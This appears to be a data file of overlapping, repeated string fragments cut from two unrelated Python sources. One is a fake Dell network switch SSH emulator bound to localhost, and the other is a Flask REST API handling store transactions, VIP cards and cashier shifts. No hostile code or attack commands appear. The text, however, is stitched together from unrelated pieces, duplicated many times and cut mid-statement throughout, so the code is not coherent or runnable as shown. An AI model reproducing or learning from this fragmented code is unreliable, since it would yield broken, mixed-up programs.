"\"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"),",
"fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs):",
"value): if self._access_vlan != value: self._access_vlan = value print(\"This could add vlan to",
"CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"),",
"CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name)",
"self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self,",
"CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"),",
"add vlan to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001,",
"could add vlan to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\",",
"*args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan",
"super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None",
"access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value print(\"This could add vlan",
"CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"), CustomPort(\"Lo0\"), ]))) ssh_service.hook_to_reactor(reactor) reactor.run()",
"CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"),",
"!= value: self._access_vlan = value print(\"This could add vlan to eth0\") if __name__",
"from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args,",
"= SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"),",
"**kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def",
"import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs)",
"CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"),",
"CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"),",
"CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"),",
"CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"), CustomPort(\"Lo0\"), ])))",
"fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class",
"def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan",
"reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import",
"from twisted.internet import reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService",
"twisted.internet import reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from",
"name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def",
"CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"),",
"CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"),",
"return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value",
"self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan !=",
"*args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property",
"class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self):",
"switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"),",
"None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if",
"SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\":",
"to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\",",
"ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"),",
"SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"),",
"__init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name):",
"CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"),",
"**kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan =",
"def access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value print(\"This could add",
"ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"),",
"CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"),",
"CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"),",
"vlan to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\",",
"class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port):",
"CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"),",
"CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def",
"def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan",
"<reponame>CC-Digital-Innovation/devops-workshop from twisted.internet import reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import",
"value print(\"This could add vlan to eth0\") if __name__ == '__main__': ssh_service =",
"eth0\") if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[",
"port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"),",
"print(\"This could add vlan to eth0\") if __name__ == '__main__': ssh_service = SwitchSshService(",
"def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self,",
"DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class",
"@access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value print(\"This could",
"SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def",
"CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"),",
"import reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core",
"CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"),",
"CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"),",
"CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"),",
"self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value print(\"This",
"from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore",
"= None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value):",
"CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"), CustomPort(\"Lo0\"),",
"self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort,",
"Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self,"
] |
[
"== 1: return { 'merch_id': merch_id, 'reason': 'Not enough in storage' }, 406",
"ShiftsDao() viprec_dao = VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def get(self, start: int, count: int):",
"--------- start: int count: int Maximum rows to return. If <= 0, return",
"master record if trans_id < 0: conn.rollback() abort(500, message='Failed to start transaction!') #",
"(trans_id,) with detail_dao._conn.cursor() as cur: try: cur.execute(sql, value) ret = [row for row",
"is None: conn.rollback() abort(500) # update VIP card info if vip_id is not",
"= MerchandiseDao() trans_dao = TransactionDao() detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao =",
"= merch_dao.consume(merch_id, count, cur) if ret: conn.rollback() if ret == -1 or ret",
"= (trans_id,) with detail_dao._conn.cursor() as cur: try: cur.execute(sql, value) ret = [row for",
"# update VIP card info if vip_id is not None: ret = viprec_dao.transact_cb(vip_id,",
"'reason': 'Illegal ID' }, 406 if ret == 1: return { 'merch_id': merch_id,",
"Arguments --------- start: int count: int Maximum rows to return. If <= 0,",
"= (start, count) else: value = (start,) with trans_dao._conn.cursor() as cur: try: cur.execute(sql,",
"= VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def get(self, start: int, count: int): ''' Arguments",
"merch_dao.consume(merch_id, count, cur) if ret: conn.rollback() if ret == -1 or ret ==",
"cur) # create transaction master record if trans_id < 0: conn.rollback() abort(500, message='Failed",
"TransactionDao() detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao = ShiftsDao() viprec_dao = VIPTransRecordDao()",
"TransDetailDao() employ_dao = EmployeeDao() shift_dao = ShiftsDao() viprec_dao = VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required",
"vip_id or None 'cashier': cashier_id: int, 'trans': [ [merch_id: int, actual_price: float, count:",
"illegal!' }, 406 conn = trans_dao._conn with conn.cursor() as cur: try: trans_id =",
"abort(500, message='Failed to start transaction!') # consume stored merchandise for merch_id, _, count",
"[row for row in cur] detail_dao._conn.commit() except Exception as e: detail_dao._conn.rollback() abort(500, message=str(e))",
"request.get_json() if 'cashier' not in data or 'trans' not in data: return {",
"start: int, count: int): ''' Arguments --------- start: int count: int Maximum rows",
"is illegal!' }, 406 conn = trans_dao._conn with conn.cursor() as cur: try: trans_id",
"from flask_restful import abort import decimal as D from db import MerchandiseDao, TransactionDao,",
"}, 406 abort(500, message=f'Unknown error at consume(): {ret}.') # fill transaction details if",
"ret == -1 or ret == 3: return { 'merch_id': merch_id, 'reason': 'Illegal",
"flask_restful import Resource from flask_restful import abort import decimal as D from db",
"0: conn.rollback() abort(500, message='Failed to start transaction!') # consume stored merchandise for merch_id,",
"'', 200 class TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int): sql = f''' select",
"if vip_id is not None: ret = viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret !=",
"in data: return { 'reason': 'cashier, trans data must be given!' }, 406",
"'UPDATE finished with error' }, 406 abort(500, message=f'Unknown error at consume(): {ret}.') #",
"logged in!' }, 406 conn.commit() except Exception as e: conn.rollback() abort(500, message=str(e)) return",
"format: { 'vip_id': vip_id or None 'cashier': cashier_id: int, 'trans': [ [merch_id: int,",
"if ret == 1: return { 'merch_id': merch_id, 'reason': 'Not enough in storage'",
"'Invalid VIP ID' }, 406 if ret == 2: return { 'vip_id': vip_id,",
"= [row for row in cur] detail_dao._conn.commit() except Exception as e: detail_dao._conn.rollback() abort(500,",
"in trans_items: ret = merch_dao.consume(merch_id, count, cur) if ret: conn.rollback() if ret ==",
"abort(500, str(e)) return [ { 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login':",
"from db import ShiftsDao, VIPTransRecordDao from .Auth import auth merch_dao = MerchandiseDao() trans_dao",
"current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum is None: conn.rollback() abort(500) #",
">= %s and T.`cashier` = E.`id` and T.`id` = D.`trans_id` group by T.`id`",
"... ] } ''' data = request.get_json() if 'cashier' not in data or",
"if ret == 2: return { 'merch_id': merch_id, 'reason': 'UPDATE finished with error'",
"result = [row for row in cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback()",
"ID' }, 406 if ret == 1: return { 'merch_id': merch_id, 'reason': 'Not",
"ret == -1: return { 'vip_id': vip_id, 'reason': 'Invalid VIP ID' }, 406",
"cur.execute(sql, value) ret = [row for row in cur] detail_dao._conn.commit() except Exception as",
"cashier, trans_items = data['cashier'], data['trans'] vip_id = data['vip_id'] if 'vip_id' in data else",
"decimal as D from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db import",
"`{merch_dao._table}` as M, `{detail_dao._table}` as D where D.`trans_id` = %s and M.`id` =",
"Exception as e: detail_dao._conn.rollback() abort(500, message=str(e)) return [ { 'merch_id': row[0], 'name': row[1],",
"employ_dao = EmployeeDao() shift_dao = ShiftsDao() viprec_dao = VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def",
"cur): conn.rollback() return { 'reason': f'Employee {cashier} not logged in!' }, 406 conn.commit()",
"where T.`id` >= %s and T.`cashier` = E.`id` and T.`id` = D.`trans_id` group",
"'sum': float(row[4]) } for row in result ], 200 @auth.login_required def post(self): '''",
"not None: ret = viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret != 0 and ret",
"'vip_id': vip_id, 'reason': 'VIP card timeout' }, 406 abort(500, message='Unknown error at VIPTransRecordDao'",
"in cur] detail_dao._conn.commit() except Exception as e: detail_dao._conn.rollback() abort(500, message=str(e)) return [ {",
"return { 'vip_id': vip_id, 'reason': 'VIP card timeout' }, 406 abort(500, message='Unknown error",
"''' value = (trans_id,) with detail_dao._conn.cursor() as cur: try: cur.execute(sql, value) ret =",
"import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db import ShiftsDao, VIPTransRecordDao from .Auth import",
"{ 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4]) }",
"value = (start,) with trans_dao._conn.cursor() as cur: try: cur.execute(sql, value) result = [row",
"abort(500) # update VIP card info if vip_id is not None: ret =",
"request from flask_restful import Resource from flask_restful import abort import decimal as D",
"], 200 @auth.login_required def post(self): ''' JSON data format: { 'vip_id': vip_id or",
"cur) if ret: conn.rollback() if ret == -1 or ret == 3: return",
"import decimal as D from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db",
"D.`trans_id` = %s and M.`id` = D.`merch_id` ''' value = (trans_id,) with detail_dao._conn.cursor()",
"str(e)) return [ { 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3],",
"{ret}.') # update shifts info if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return { 'reason':",
"consume(): {ret}.') # fill transaction details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error",
"class TransactionApi(Resource): @auth.login_required def get(self, start: int, count: int): ''' Arguments --------- start:",
"return { 'reason': f'Cashier ID {cashier} is illegal!' }, 406 conn = trans_dao._conn",
"ret != 1: conn.rollback() if ret == -1: return { 'vip_id': vip_id, 'reason':",
"ret == 3: return { 'merch_id': merch_id, 'reason': 'Illegal ID' }, 406 if",
"details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error occured while filling ' 'transaction",
"%s and T.`cashier` = E.`id` and T.`id` = D.`trans_id` group by T.`id` order",
"conn.cursor() as cur: try: trans_id = trans_dao.start(cashier, cur) # create transaction master record",
"}, 406 cashier, trans_items = data['cashier'], data['trans'] vip_id = data['vip_id'] if 'vip_id' in",
"T.`id` = D.`trans_id` group by T.`id` order by T.`time` desc ''' if count",
"data must be given!' }, 406 cashier, trans_items = data['cashier'], data['trans'] vip_id =",
"count > 0: sql += ' limit %s' value = (start, count) else:",
"trans_id = trans_dao.start(cashier, cur) # create transaction master record if trans_id < 0:",
"at consume(): {ret}.') # fill transaction details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500,",
"enough in storage' }, 406 if ret == 2: return { 'merch_id': merch_id,",
"None: ret = viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret != 0 and ret !=",
"= EmployeeDao() shift_dao = ShiftsDao() viprec_dao = VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def get(self,",
"sql = f''' select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price, D.`count` from `{merch_dao._table}`",
"as E, `{detail_dao._table}` as D where T.`id` >= %s and T.`cashier` = E.`id`",
"int count: int Maximum rows to return. If <= 0, return all rows.",
"return { 'reason': f'Employee {cashier} not logged in!' }, 406 conn.commit() except Exception",
"{ret}.') # fill transaction details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error occured",
"'cashier_login': row[3], 'sum': float(row[4]) } for row in result ], 200 @auth.login_required def",
"'reason': 'cashier, trans data must be given!' }, 406 cashier, trans_items = data['cashier'],",
"{cashier} not logged in!' }, 406 conn.commit() except Exception as e: conn.rollback() abort(500,",
"''' data = request.get_json() if 'cashier' not in data or 'trans' not in",
"must be given!' }, 406 cashier, trans_items = data['cashier'], data['trans'] vip_id = data['vip_id']",
"'Not enough in storage' }, 406 if ret == 2: return { 'merch_id':",
"@auth.login_required def post(self): ''' JSON data format: { 'vip_id': vip_id or None 'cashier':",
"merch_id, 'reason': 'UPDATE finished with error' }, 406 abort(500, message=f'Unknown error at consume():",
"MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db import ShiftsDao, VIPTransRecordDao from .Auth import auth",
"data['vip_id'] if 'vip_id' in data else None if not employ_dao.has_id(cashier): return { 'reason':",
"TransactionApi(Resource): @auth.login_required def get(self, start: int, count: int): ''' Arguments --------- start: int",
"{ 'merch_id': merch_id, 'reason': 'Illegal ID' }, 406 if ret == 1: return",
"f''' select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price, D.`count` from `{merch_dao._table}` as M,",
"[row for row in cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500, str(e))",
"D where T.`id` >= %s and T.`cashier` = E.`id` and T.`id` = D.`trans_id`",
"by T.`time` desc ''' if count > 0: sql += ' limit %s'",
"None: conn.rollback() abort(500) # update VIP card info if vip_id is not None:",
"int, count: int): ''' Arguments --------- start: int count: int Maximum rows to",
"row[0], 'name': row[1], 'actual_price': float(row[2]), 'orig_price': float(row[3]), 'count': row[4] } for row in",
"select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price, D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}`",
"from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db import ShiftsDao, VIPTransRecordDao from",
"return [ { 'merch_id': row[0], 'name': row[1], 'actual_price': float(row[2]), 'orig_price': float(row[3]), 'count': row[4]",
"merch_id, 'reason': 'Not enough in storage' }, 406 if ret == 2: return",
"406 abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts info if",
"int, 'trans': [ [merch_id: int, actual_price: float, count: int], ... ] } '''",
"import abort import decimal as D from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao",
"'vip_id' in data else None if not employ_dao.has_id(cashier): return { 'reason': f'Cashier ID",
"if trans_sum is None: conn.rollback() abort(500) # update VIP card info if vip_id",
"None if not employ_dao.has_id(cashier): return { 'reason': f'Cashier ID {cashier} is illegal!' },",
"D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price, D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as",
"merchandise for merch_id, _, count in trans_items: ret = merch_dao.consume(merch_id, count, cur) if",
"'reason': 'UPDATE finished with error' }, 406 abort(500, message=f'Unknown error at consume(): {ret}.')",
"<gh_stars>0 # -*- coding: utf-8 -*- from flask import request from flask_restful import",
